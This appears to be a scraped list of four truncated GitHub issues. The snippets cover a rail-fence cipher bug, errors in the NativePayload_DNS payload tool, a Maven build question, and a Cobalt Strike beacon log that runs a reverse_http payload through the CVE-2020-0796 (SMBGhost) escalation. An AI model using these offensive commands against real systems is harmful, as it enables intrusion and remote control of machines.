
Results 4 issues of Alphabug

![1]( ![2]( ![3]( 栅栏算法明显有问题。。 `①把将要传递的信息中的字母交替排成上下两行。 ②再将下面一行字母排在上面一行的后边,从而形成一段密码。 ③例如: 明文:THE LONGEST DAY MUST HAVE AN END 加密: 1、把将要传递的信息中的字母交替排成上下两行。 T E O G S D Y U T A E N N H...

Command Syntax : NativePayload_DNS.exe "StartIpaddress" counter_Number_of_Records "FakeDNS_Server" Command Syntax : NativePayload_DNS.exe "1.1.1." 34 "" for more information please visit github account for this tool [1] error: 索引超出了数组界限。 NativePayload_DNS by Damon...

Can you Help me? - JDK 1.8 - mvn - CentOS `mvn compile`

```bash beacon> elevate CVE_2020_0796 Doc [*] Task Beacon to run windows/beacon_http/reverse_http (x.xx.x.x:x) via CVE-2020-0796 [+] host called home, sent: 17842 bytes [+] received output: connect() failed with error: 10049 ```...